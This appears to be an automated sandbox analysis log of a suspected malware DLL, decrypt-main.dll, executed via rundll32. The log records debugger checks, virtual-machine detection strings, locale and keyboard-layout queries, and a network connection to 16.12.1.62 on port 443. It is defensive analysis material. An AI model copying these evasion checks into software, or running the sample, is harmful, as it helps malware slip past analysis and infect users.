Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeFile opened / queried: C:\Users\user\Desktop\VMware Workstation.lnkJump to behavior
Source: C:\Windows\System32\loaddll64.exe TID: 7460Thread sleep time: -120000s >= -30000sJump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00415080 FindFirstFileW,FindClose,3_2_00415080
Source: C:\Windows\System32\rundll32.exeCode function: 4_1_00415080 FindFirstFileW,4_1_00415080
Source: C:\Windows\System32\rundll32.exeCode function: 10_2_00415080 FindFirstFileW,FindClose,10_2_00415080
Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00415080 FindFirstFileW,FindClose,14_2_00415080
Source: C:\Windows\System32\rundll32.exeCode function: 15_2_00415080 FindFirstFileW,FindClose,15_2_00415080
Source: C:\Windows\System32\rundll32.exeCode function: 15_1_00415080 FindFirstFileW,15_1_00415080
Source: C:\Windows\System32\rundll32.exeCode function: 17_1_00415080 FindFirstFileW,17_1_00415080
Source: C:\Windows\System32\rundll32.exeCode function: 4_1_00417CD0 GetSystemInfo,4_1_00417CD0
Source: C:\Windows\System32\loaddll64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\System32\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\Jump to behavior
Source: C:\Windows\System32\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\Jump to behavior
Source: C:\Windows\System32\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_dec_27d8c3fe9e4ce467db0e38d9cdded62657c28_b4dfb63c_1035b44d-43cf-4336-9f4b-7f94949dfc2c\Jump to behavior
Source: C:\Windows\System32\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\WER\Jump to behavior
Source: C:\Windows\System32\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueueJump to behavior
Source: C:\Windows\System32\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_dec_e26d2cbdf0ab1647723bb3a38bd2737c2e0af57_b4dfb63c_e5ced0b6-a51a-4527-9ac5-1082608266c4\Jump to behavior
Source: Amcache.hve.7.drBinary or memory string: VMware
Source: decrypt-main.dll.dllBinary or memory string: \VMware Workstation.lnk
Source: Amcache.hve.7.drBinary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin
Source: Amcache.hve.7.drBinary or memory string: VMware, Inc.
Source: Amcache.hve.7.drBinary or memory string: VMware20,1hbin@
Source: rundll32.exe, 0000000F.00000002.2904017483.000001FE9D84E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Users\user\Desktop\VMware Workstation.lnk?
Source: Amcache.hve.7.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.7.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.7.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: rundll32.exe, 00000003.00000002.1836201248.000001B71A00E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.1836201248.000001B719FA4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.1836201248.000001B719F95000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: Amcache.hve.7.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: rundll32.exe, 0000000F.00000002.2904569459.000001FE9F206000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: -C:\Users\user\Desktop\VMware Workstation.lnk
Source: rundll32.exe, 0000000F.00000002.2904017483.000001FE9D84E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Users\user\Desktop\VMware Workstation.lnk
Source: Amcache.hve.7.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.7.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.7.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.7.drBinary or memory string: vmci.sys
Source: Amcache.hve.7.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin`
Source: Amcache.hve.7.drBinary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.7.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: rundll32.exe, 0000000E.00000002.2904346932.0000022C05786000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: -C:\Users\user\Desktop\VMware Workstation.lnk,
Source: Amcache.hve.7.drBinary or memory string: VMware20,1
Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.7.drBinary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.7.drBinary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.7.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.7.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.7.drBinary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.7.drBinary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.7.drBinary or memory string: VMware Virtual RAM
Source: Amcache.hve.7.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.7.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Windows\System32\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_3-6852
Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\System32\rundll32.exeNetwork Connect: 16.12.1.62 443Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",#1Jump to behavior
Source: C:\Windows\System32\rundll32.exeCode function: GetUserDefaultUILanguage,GetLocaleInfoW,3_2_00415230
Source: C:\Windows\System32\rundll32.exeCode function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,3_2_004142E0
Source: C:\Windows\System32\rundll32.exeCode function: GetUserDefaultUILanguage,GetLocaleInfoW,10_2_00415230
Source: C:\Windows\System32\rundll32.exeCode function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,10_2_004142E0
Source: C:\Windows\System32\rundll32.exeCode function: GetUserDefaultUILanguage,GetLocaleInfoW,14_2_00415230
Source: C:\Windows\System32\rundll32.exeCode function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,14_2_004142E0
